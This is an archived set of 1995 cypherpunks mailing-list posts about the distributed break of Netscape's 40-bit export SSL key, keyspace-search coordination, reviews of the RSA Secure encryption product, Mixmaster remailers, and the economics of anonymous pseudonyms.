   This data is also available as a table for users with a suitable
   browser.

%age  ACKs NoAs ACK/n ID
===== ==== ==== ===== ======================
8.498 5569 1572 0.780 jshekter@alias.com
2.182 1430  454 0.759 pjw@dcs.ed.ac.uk
1.892 1240    8 0.994 jelson@jhu.edu
1.587 1040  386 0.729 martin@mrrl.lut.ac.uk
1.437  942  412 0.696 bal@mit.edu
1.375  901    0 1.000 rkel02@cs.auckland.ac.nz
1.367  896   51 0.946 nathanw@mit.edu
1.294  848  567 0.599 cwe@it.kth.se
1.083  710  879 0.447 floeff@mathematik.uni-stuttgart.de
1.044  684   42 0.942 aba@dcs.ex.ac.uk
1.025  672    0 1.000 bande@lut.fi
1.003  657  214 0.754 don@cs.byu.edu
0.891  584  254 0.697 droelke@aud.alcatel.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 31 Aug 95 00:00:51 PDT
To: cypherpunks@toad.com
Subject: Article in the Guardian (UK) about Hal2 not bad ....
Message-ID: <"swan.cl.cam.:114490:950831070035"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


An article by Azeem Azhar on page three of today's "The Guardian Online"
(he tells me it is available only in paper form !) is fairly positive.
He puts over the main point: "since US government regulations prevent the
export of software that uses stronger cryptographic techniques".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 31 Aug 95 08:49:59 PDT
To: cypherpunks@toad.com
Subject: Some details on RSA Secure
Message-ID: <9507318098.AA809884265@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Here are my biased comments on RSA Secure.  They are biased by
the fact that I an a techie who works for RSA Data Security.

Neatest Features:
- It is integrated with the File Manager on Windows and the
  Finder on Mac System 7.
    For example, from the file manager you can double click on
  an encrypted Excel spread sheet and the file will automatically
  decrypt and launch Excel.  The decryption can be automatic
  because the file manager hangs on to your password for a settable
  number of minutes.

- A settable list of files can be automatically decrypted (or
  encrypted) on system startup (or shutdown).

Technical Features:
- The random number generator for file encryption keys and public
  keys is seeded by user keystrokes or wiggling the mouse.  The
  GUI for this is really fun to play with, but it only comes up
  when you first install the software.

- The user's passphrase unlocks a master key that is used to unlock
  the file encryption key for each file.

- Tamper detection for encrypted files using an MD5 hash.

- If emergency key access is turned on then the file encrypting
  key is also encrypted with the public key for emergency key
  access.  That public key is usually split into 5 or more pieces
  and two or three of the pieces are required to perform the
  emergency access functions.  A quick look at the file header
  reveals whether the escrow feature is in use.

- Files encrypted with the 40 bit demo version can be read by
  the 80 bit commercial version, and will be automatically
  upgraded to 80 bit security when they are reencrypted.

- Runs on DOS, Windows, Mac, and SunOS.  Other ports coming soon.


Coming Soon:
- Password based file sharing.  A simple way to protect files
  in transit using a secret passphrase known only to the sender
  and receiver.  Currently, only the person who encrypted the
  file can decrypt it.

- Self decrypting binaries.  This allows you to send an encrypted
  file to someone who does not have RSA Secure.  They execute
  the file, which then asks for the password and extracts the
  contents if the password is correct.  The sender can choose
  to use 40 or 80 bit encryption keys in order to comply with
  export regulations.

Request for Improvements:

        What else should be in a product that is aimed at
the commercial laptop market?

                --Bob Baldwin







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William R. Nugent" <wnug@loc.gov>
Date: Thu, 31 Aug 95 06:18:22 PDT
To: cypherpunks@toad.com
Subject: opinions on RSA Secure?
Message-ID: <199508311318.JAA47267@rs8.loc.gov>
MIME-Version: 1.0
Content-Type: text/plain



c'punks:

RSA Secure appears to be a neat commercial package: it loads easily, runs fast, and
and generates an 80-bit key using Rivest's RC4. It has an "emergency access"
feature (splittable key escrow) which can, however, be disabled by the user.
Has anyone checked out the innards? Hoe secure is it in industrial/commercial
usage?; against the TLAs?; any hidden trapdoors?
Thanks in advance for your views.

Bill Nugent
Library of Congress
(a personal, not an institutional, query)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 31 Aug 95 09:30:44 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Poisson numbers for random keyspace assignment
Message-ID: <ac6b2e22000210046f2c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:49 AM 8/31/95, MONTY HARDER wrote:
>                  [Great statistical summary deleted]

Thanks. Two other people sent me e-mail saying the odds of a keyspace chunk
being left uncovered are 1/e, so this part is pretty well known. (With an
expectation of "1" of course, as I noted. Interestingly, this was the same
formula we used at Intel to figure out chip yields: "What's the probability
that a chip will have zero defects given that m defects are the "expected"
number?")

I wanted to explain the derivation in more detail than just saying 1/e,
especially for the more interesting cases where the keyspace gets more
coverage. (Where the m = expected value is more than 1.)

>TC> * For opportunistic attacks on keys in challenges, the odds are 95% that a
>TC> key will be found with only twice the total effort (or time) using a
>TC> totally random method of picking up keyspace to search.
>
>  The odds can be improved somewhat by scaling the granularity of the
>sweep to the size of the sweep. (Align larger chunks on large-chunk
>boundaries, eliminating the chance of overlap with other large chunks.)

Indeed, this is an effect to consider. That is, each searcher is
(presumably) not overlapping, so the results I reported are sort of a bound
on the actual numbers. At one end, with lots of searchers doing very small
fractions of the total, the results are pure Poisson. At the other end,
with a searcher covering most or all of the keyspace, then of course the
results are those of nonrandom search. Practically speaking, with dozens or
hundreds of searchers, the Poisson results produce accurate enough
estimates.

>  The best advantage of the random method is that it allows people to
>participate completely anonymously, as there is nothing to report save
>the Eureka!, and that can be done through a remailer anyway. When the
>challenge is solved, everyone can stop cracking.

A very good point! Anonymous cracking has many advantages.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Stewarts@ix.netcom.com)
Date: Wed, 20 Sep 95 16:27:09 PDT
To: cypherpunks@toad.com
Subject: RE: CIA & ESPIONAGE
Message-ID: <9509201546405398@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 31 Aug 1995 02:31:07 -0700
To: cypherpunks@toad.com
From: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: CIA & Espionage


>> >It was said that Pres. Clinton had given a speech while 
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
>> >said in this speech that obtaining  industrial 
>> >informations has the highest priority and this were the 
>> >new  task for the spies.

Did he really say the priority was stealing information from
other people, or only protecting Big American Companies from 
those nasty French Spy Agency persons?  (Clinton being who he is,
I'd expect him to say a politically correct version of the latter, 
whether he means the former or not, just like his predecessor.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 31 Aug 95 07:21:47 PDT
To: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Subject: Re: your mail
In-Reply-To: <Pine.3.89.9508120103.A2501-0100000@khijol>
Message-ID: <Pine.BSD/.3.91.950831100347.11085H-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 12 Aug 1995, Ed Carp [khijol SysAdmin] wrote:

> I always thought he was an AI program that someone put in a lot of 
> abusive crap to be funny - then someone accidentally let it loose on the 
> net ;)

Unfortunatly, this is a wetware being; I did have the pleasure of meeting 
him at a speech given by him and Dave Mandl a few years back.  He did an 
excellent speech, and was very informative.  At the time, being a 
neophite cypherpunk, I found the info enlightening.  But alas, his human 
interaction skills rate below what one would find in a kindergarten.

He's not a bad guy really, just vicious when it comes to manners.  At 
times, he takes the net.cop attitude.  And we all know how well that 
works in an anarchistic organization/group/entity such as the cypherpunks.
He's a great cryptographer/programmer too from what I've seen.

At times, I do respect his skills, but his attitudes belong in /dev/nul.

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MINITERS@citadel.edu
Date: Thu, 31 Aug 95 07:32:52 PDT
To: cypherpunks@toad.com
Subject: VCRPLUS Huffman code
Message-ID: <01HUPXCYJA9I000AKW@CITCS.Citadel.edu>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone worked out the VCRPLUS code?

The TVGuide has a litsing  which can be used to set up a VCR by
employing a series of numbers which encode date/timestart/timefinish/channel
in a minimized sequence which I believe is a Huffman code(David Huffman-MIT MS
thesis 1954) I am interested in if anyone has taken the time to figure out
the algorithm?
please respond to me directly so as not to clutter the list if you don't mind.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 31 Aug 95 02:31:59 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: Poisson numbers for random keyspace assignment
In-Reply-To: <8B0251E.00030003C4.uuout@famend.com>
Message-ID: <"swan.cl.cam.:171030:950831093019"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>   The whole thing can be managed via Imail, which I must point out to
> you Totally Connected People, is the least-common denominator for
> participation here. You have =lots= of people out here who would like to
> join the Cypherpunks Brute Squad (We gotta get T-shirts for this one!)
> but don't have WWW access.

I had the impression that there were email / WWW gateways -- are there not ?
If there are, could someone send me (privately) info, and I'll try to sort
out an easy way to do it.

Failing that, email me with either:

	Subject: Request for brute keyspace

	request 20 segments

or

	Subject: ACK for brute keyspace

	ACK        2977 3659 0ce1 1 no


(some indication of number of email only people who would like to participate
 would be useful. Email me (not CP!) with a subject line of "offer for brute"
 giving your total k/s rate so I know how much power thgere is out there
)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp1.anu.edu.au>
Date: Wed, 30 Aug 95 17:46:55 PDT
To: cypherpunks@toad.com
Subject: PGP on UK TV
Message-ID: <9508310046.AA06956@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if someone has already posted this but I didn't think
I had seem it on the list:

Found this on Uk.misc:

==========================
alecm@coyote.uk.sun.com (Alec Muffett) wrote:
>>
>>	Sunday 3rd September. 7:00pm on Channel 4. Equinox.
>>
>>	"Cybersecurity" - an investigation into cryptography, the
>>	Internet, civil rights, Phil Zimmerman, PGP (and should we be
>>	permitted to use it?) and so forth.
>>
>>I, for one, am going to be videoing it.
>>Let's just hope they get it right.
>
>Having seen a preview trailer of the program I am glad to say that it
>comes down on the _right_ side (ie right to privacy, etc).
>
>It also refers to cipherpunks as "rebel programmers" - I dunno but
>I quite like this description of them :-) Has a sort of cult-hero status
>about it. 
==========================

Sherry

ps Can't watch it cos I'm in Oz let us know if it was any good.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlsiil@attmail.com (Karl A Siil)
Date: Thu, 31 Aug 95 08:21:34 PDT
To: cypherpunks@toad.com
Subject: Re: opinions on RSA Secure?
In-Reply-To: <199508311318.JAA47267@rs8.loc.gov>
Message-ID: <winATT-2.7-karlsiil-1478>
MIME-Version: 1.0
Content-Type: text/plain


Bill, et. al.,

>and generates an 80-bit key using Rivest's RC4. It has an "emergency access"
>feature (splittable key escrow) which can, however, be disabled by the user.
	.
	.
	.
>Bill Nugent
>Library of Congress
>(a personal, not an institutional, query)

To clarify, the Emergency Access (EA) feature's owner (e.g., the Site Security
Officer (SSO)) can determine whether to *allow* users to disable EA. A 
possible way one brings RSA Secure to the(ir) masses of users is as follows:

	The SSO (or some equivalent) gets the software and configures EA 
	(i.e., generates EA keys) on their PC. An important part of
	the EA config is the creation of a User Disk which is distributed
	to the users of the package. On that disk goes the cryto-stuff
	that lets EA work in the future, plus the config data (including
	whether or not the EA can be overridden).

	The users, on getting the User disks from the SSO, then configure
	their PC's to encrypt/decrypt their files. If the SSO hasn't
	allowed EA disabling, when the users encrypt, the "Disable EA"
	checkbox is greyed out (missing? I forget; I would prefer it to
	be missing if not available).

The important thing here is that the ability to control the RSA Secure 
"policy" is in the same hands as the responsiblity for creating the org's 
security policy, if any.

Personally, I find RSA Secure to be quite a nice package, from a usage point 
of view. The way it blends into FileManager is really convenient. The less I 
have to "work at" security, the more likely it is that I'll use it. The crypto
is satisfactory for my needs and I'm not going to rehash (no pun intended) the
arguments over RC4-40, etc.


					Karl A. Siil
					AT&T Bell Labs
					Holmdel, NJ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hodges@CNMAT.CNMAT.Berkeley.EDU (Richard Hodges)
Date: Thu, 31 Aug 95 11:36:39 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
Message-ID: <v02130503ac6bbec86307@[128.32.122.198]>
MIME-Version: 1.0
Content-Type: text/plain


Lance Cottrell writes:

>Because of the message size limitations there are some advantages to
>sending the mixmaster chain through some type 1 remailers first, rather
>than sending a type 1 message in a Mixmaster packet.

Are there any gateways that will take a (pgp-encrypted) type 1 message,
with presumably some kind of headers giving onward routing information and
put it into the type 2 network?

Should there be such a service? I think this was discussed earlier, but
Lance's statement above seems to reopen the discussion.


>It is very difficult to know what fraction of the traffic I see is cover. I
>generate some cover traffic my self, and I know some others do as well.
>Right now a reordering pool of 5 messages results in a latency of about 30
>min. Mixmaster is no longer a small fraction of the remailer market. A
>majority of all public remailers support Mixmaster.

What is the total daily volume of mixmaster traffic for all the advertised
mixmasters? Has anyone measure this statistic?

Regards,
Richard Hodges






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@hns.com (Tom Rollins)
Date: Thu, 31 Aug 95 09:26:18 PDT
To: cypherpunks@toad.com
Subject: Fiat Shamir Zero Knowledge Test
Message-ID: <9508311626.AA12640@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


Hello,

Can someon point me to a net description of
the "Fiat Shamir Zero Knowledge Test" used
in the RCA DirecTV smart cards.

Thanks in advance...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Thu, 31 Aug 95 10:30:38 PDT
To: jirib@cs.monash.edu.au
Subject: Re: SSL search attacks
In-Reply-To: <199508310926.TAA18041@sweeney.cs.monash.edu.au>
Message-ID: <9508311728.AA16306@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum writes
>> *coordinated* attack on the key.  We've established that there is a 1/e
>> cost factor in removing the central server.  I just threw out these
>...
>
>Wouldn't it be possible to reduce the cost?
>
>Each client could pick a segment at random, check it and then broadcast
>a NAK. Other clients would then know that the segment in question has
>been done, and avoid picking it in the future. If you are worried about
>collisions, one could also have IGRAB, which would advise others that
>someone is working on a segment (you can still collide, but not so
>often).

This only reduces the cost if everyone is playing fair.  In practice,
it will usually *increase* the cost.  A denial of service attack can be
mounted by the owner of the key just by anonymously NAKing the segment
with the key.  Then you have to search the *whole* keyspace, fail to
find it, and start over with a new strategy.

>One advantage is that it is not necessary to have a central infinitely
>trusted server. (Nothing personal, but bogus server is an attack.)

An attack on what?  The overall model here is that someone presents
the world at large with a problem to solve.  Someone else volunteers
to coordinate the effort by providing a server.  Providing a bogus
server is an attack in the sense that it wastes the CPU cycles of
the clients, but they're junk cycles anyway.  It's kind of like the
issue about being "unable to participate" because the group effort
ignores the efforts of random searchers.  Those searchers *aren't*
participating, and not ignoring them opens the server to attack.
An "effort" coordinated by a bogus server is no effort at all.

My point is that the "random" efforts are no different than everyone
working on the problem independently, each picking a random place to
start and going sequentially from there.

>NAKs and IGRABs would be weighted by the trust accorded to the entity
>that originated them.

This is similar to what I outlined yesterday afternoon.  Let unsolicited
NAKs and IGRABs represent adjustments to the probability that a segment
is assigned to a client *inside* the group.  Invalid unsolicited NAKs
don't destroy the current search, they only slow it down slightly ---
but less than a fully random effort.

>Notes:
>  * the NAKs could be sent by e-mail, thus allowing badly connected
>and/or anonymous entities to participate.

This could be done in any case.  It just slows down the effective search
rate of the e-mail participants.

This might be an argument in favor of requesting more space as you get
near the end of your current space, though.  When the communications
latency starts to approach the segment search time, you cut down your
waiting time by prefetching work.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 31 Aug 95 09:37:40 PDT
To: cypherpunks@toad.com
Subject: Crypto '95
Message-ID: <199508311637.MAA24666@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anything really fun revealed at Crypto?

Anything fun at the rump session?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 31 Aug 95 12:33:30 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
Message-ID: <ac6bbf36020210047fff@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 PM 8/31/95, Richard Hodges wrote:
>Lance Cottrell writes:
>
>>Because of the message size limitations there are some advantages to
>>sending the mixmaster chain through some type 1 remailers first, rather
>>than sending a type 1 message in a Mixmaster packet.
>
>Are there any gateways that will take a (pgp-encrypted) type 1 message,
>with presumably some kind of headers giving onward routing information and
>put it into the type 2 network?
>
>Should there be such a service? I think this was discussed earlier, but
>Lance's statement above seems to reopen the discussion.
>
>
>>It is very difficult to know what fraction of the traffic I see is cover. I
>>generate some cover traffic my self, and I know some others do as well.
>>Right now a reordering pool of 5 messages results in a latency of about 30
>>min. Mixmaster is no longer a small fraction of the remailer market. A
>>majority of all public remailers support Mixmaster.
>
>What is the total daily volume of mixmaster traffic for all the advertised
>mixmasters? Has anyone measure this statistic?
>
>Regards,
>Richard Hodges

You don't need anything this fancy. Just have Mixmaster dump the message to
a file rather than sending it (-o option). Then make that the message you
send through the type 1 chain, and make the first Mixmaster remailer the
final destination of the type 1 chain.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 31 Aug 95 06:10:43 PDT
To: Sam Quigley <poodge@econ.berkeley.edu>
Subject: Re: yabc
In-Reply-To: <199508310523.WAA21036@quesnay.Berkeley.EDU>
Message-ID: <Pine.SOL.3.91.950831135429.29780C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Sam Quigley wrote:
 
> Also, it seems that there have been some "extensions" to the SKSP
> protocol...  For instance, suddenly there are different machines
> dedicated just to ACKs, etc.  Is there a central repository of these
> changes?  (Have these changes even been publicly reviewed?)

These aren't changes to the protocol, which just defines what a client and
a server should understand.  The "local" servers that only do ACKs are
designed to collect up reponses from a local client farm and then feed
them en-masse to the central server, using SKSP.

To answer your second point, there are ideas being floated around between 
Adam, Piete and myself as to the "next step".

I had the idea that the load on the central server might be reduced by
having a system where clients register their availability times, PGP key
and computing horsepower to the server, and the server calls the client at
the start of an available period and hands it a keyspace that fills the
time available.  PGP signatures on all exchanges would authenticate the
parties and it would be impossible for large keyspaces to be requested in
error or malicously.  Un-ack'd keyspaces would wrap around.  This idea
needs quite a bit more coding and people have expressed reservations about
just how much load would be saved.

On the other hand, Piete has a proposal that also uses PGP signatures and
retains the existing protocol.  The central server would remain as is, but
would only accept ACKs from servers that it trusted via a signed PGP key. 
There would be a small number of such second level servers, perhaps one in
each country.  This hierarchy of trust extends downwards as far as is
necessary in each country with clients being at the leaf nodes of the
tree.  This method spreads the load worldwide in a very effective manner,
with the final central server only receiving calls from a handful of other
servers.  This idea needs less coding than mine and solves the immediate
problem. 

We're still talking, and listening...


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 31 Aug 95 15:51:30 PDT
To: "William R. Nugent" <wnug@loc.gov>
Subject: Re: opinions on RSA Secure?
In-Reply-To: <199508311318.JAA47267@rs8.loc.gov>
Message-ID: <Pine.BSD.3.91.950831154639.27318A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 31 Aug 1995, William R. Nugent wrote:

> Date: Thu, 31 Aug 1995 09:18:18 -0400
> From: William R. Nugent <wnug@loc.gov>
> To: cypherpunks@toad.com
> Subject: opinions on RSA Secure?
> 
> 
> c'punks:
> 
> RSA Secure appears to be a neat commercial package: it loads easily, runs fast, and
> and generates an 80-bit key using Rivest's RC4. It has an "emergency access"
> feature (splittable key escrow) which can, however, be disabled by the user.
> Has anyone checked out the innards? Hoe secure is it in industrial/commercial
> usage?; against the TLAs?; any hidden trapdoors?
> Thanks in advance for your views.

The fact that the key is only 80 is *major* compromise.  I would 
recommend that package to no-one.   With only a 80 bit key you dont 
*need* trapdoors, granted they may be more "convienient" but the fact is 
the 80 key *can* [and certainly will] be broken...

Summary: Don't used it.


Btw, this is not an opposition to RSA, RSA is very good - it is an 
opposition to the length of the key...

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Thu, 31 Aug 95 08:01:51 PDT
To: cypherpunks@toad.com
Subject: UK Guardian article on 2nd SSL breaking
Message-ID: <199508311501.RAA19171@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



from the "uk-pipeline":

>>>>>>>>>>>>>>>>>>>>

  CYPHERPUNKS LEAD NETSCAPE'S NAVIGATOR ASTRAY
  
  A team of computer experts has succeeded in breaking the secure 'key' 
  used on international versions of the World-Wide Web browser, Netscape 
  Navigator.
  
  The key would normally have been used to secure transmission of sensitive 
  information, such as credit card details, between a Web-surfer and a Web 
  site, such as an on-line shopping service.
  
  However, the cypherpunks, as they are known, only cracked the 40-bit key 
  that is used by export versions of Netscape Navigator, since US 
  Government regulations prevent the export of software that uses stronger 
  cryptographic techniques. "We have, quite categorically, demonstrated 
  that 40-bit keys are too weak to use for commercial systems," said Dr. 
  Piete Brookes, a computer officer at Cambridge University who managed the 
  project.  The code cracking took 31 hours and 47 minutes of computer time 
  on around 300 machines strung across the internet.
  
  The team was able to crack the code because they had been provided with 
  the transcript of a secure transmission.  Such transcripts are not 
  impossible to acquire, according to Dr. Brookes: "All you need is a tap 
  on the line, or access to a computer in a suitable part of the network.". 
  The 128-bit key used by American versions of Netscape Navigator is "well 
  out of reach of any hacker groups in the forseeable future."  He 
  estimates it would take one billion, billion, billion, billion years to 
  break.
  
  	Azeem Azhar
  
  Further information can be found on the World-Wide Web at 
  http://www.dcs.ex.ac.uk/~aba/

>>>>>>>>>>>>>>>>>>>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 31 Aug 95 17:22:53 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6b9e29040210042a10@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:32 PM 8/31/95, Scott Brickner wrote:
>I was thinking about some issues related to electronic commerce, and it
>occurred to me that there is a significant problem in conducting
>business with untraceable pseudonyms (anonyms?).  The problem occurred
>to me while considering inheritance.
>
>If one operates a business under an anonym (as opposed to the sort of
>conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit
>Cards" <URL:ftp://ftp.research.att.com/dist/anoncc/anoncc.ps.Z>),
>there's a strategy for transferring unlimited funds to one's
>posterity.
>
>Consider a business which typically has a lot of assets, but which are
>offset by a lot of liabilities --- almost any sort of VAR will do, for
>instance.  In your will, you leave the key to unlock a private message
>to your heir, in which you hand over the information necessary to
>assume your anonym.  Since the heir presumably has his own identity
>(whether anonymous or not is immaterial, except to *his* heirs), and
>the anonym can't be linked to you, he has no reason to care about
>maintaining the reputation of the anonym.  In dismantling the anonym,
>he sells its assets to his own identity at a fraction of their worth,
>and defaults on the liabilities.
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^

You don't have to look to death and inheritance for this problem to crop
up. Similar situations arise when:

- a pseudonym simply decides to dissolve the current pseudonym and shift
focus to another pseudonym (perhaps transferring a bunch of assets, then
simply vanishing and leaving "no forwarding address')

(This is of course the basis of any number of scams and "boiler room
operations." Crypto does not completey eliminate scams like this, and, in
fact, generates some new kinds of scams.)

- this is also a well-known problem with any services that handle money,
valuables, etc. For example, the money courier who vanishes to Rio de
Janeiro.

This is one thing that _bonding_ is designed to partially ameliorate. One
posts a bond which is greater than the amount being carried, or at least is
some large amount. (Calculations are complex, and various agencies may have
various policies, depending on other reputation factors.)


>Since the anonym behaved reputably during its life, it developed what
>would have been a credit-worthy reputation, had it been a (traceable)
>pseudonym.  But, since there's nothing to link the anonym to its heirs
>(or ancestors), the creditors of the anonym must eat the loss.

The concept of "reputation capital" is a critical one.

ideally, one never "trusts" an agent with a transaction greater than the
value of the reputation capital he will lose if he defaults.

There are still scams and manouvers to thwart this reputation capital
scheme. The agent planning to "defect" (default, split, abscond, renege,
etc.) can try to pile up as many pending transactions as possible,
anticipating that the various transactees will be unaware of each other.
(This of course happens in real life.)

Whether cryptographic protocols (cf. the "encrypted open books" proposal by
eric Hughes for one approach which may be useful) solve this problem is not
known at this time. But the non-crypto world has of course not solved this
problem, either.

...
>A market which permits anonyms to have credit based on reputation will
>probably have a constant stream of defaults caused by such behavior,
>representing a significant risk factor in extending credit to anonyms
>which can't be predicted by reputation.
>
>Comments?

Lots of issues need to be thought about. My hunch is that economists, game
theorists, and scam artists will all discover digital money and pseudonyms
and will explore various aspects of this situation.

I devoted a pretty big chunk of my Cyphernomicon to these "darker sides" of
anonymity, of reputation capital, and suchlike. By no means did I cover all
the issues of "crypto anarchy," but I suggest interested folks take a look
at the chapter on crypto anarchy for more discussion.

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 31 Aug 95 17:43:41 PDT
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: opinions on RSA Secure?
In-Reply-To: <95Aug31.202112edt.1621@cannon.ecf.toronto.edu>
Message-ID: <Pine.BSD.3.91.950831174002.16046A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 31 Aug 1995, SINCLAIR DOUGLAS N wrote:
> 
> > The fact that the key is only 80 is *major* compromise.  I would 
> > recommend that package to no-one.   With only a 80 bit key you dont 
> > *need* trapdoors, granted they may be more "convienient" but the fact is 
> > the 80 key *can* [and certainly will] be broken...
> I disagree.  If we assume that RC4 and DES can be run at the same speed
> (I don't know how true this is) then 80 bit RC4 is 2^24 times harder
> to break than DES.  That's 16 million.  A machine that will crack
> DES in one day is of the order of one million dollars.  It would take
> 50,000 years to crack 80-bit RC4.  Alternativly, a one-day crack
> would cost 16 trillion dollars.  I feel safe with those numbers.
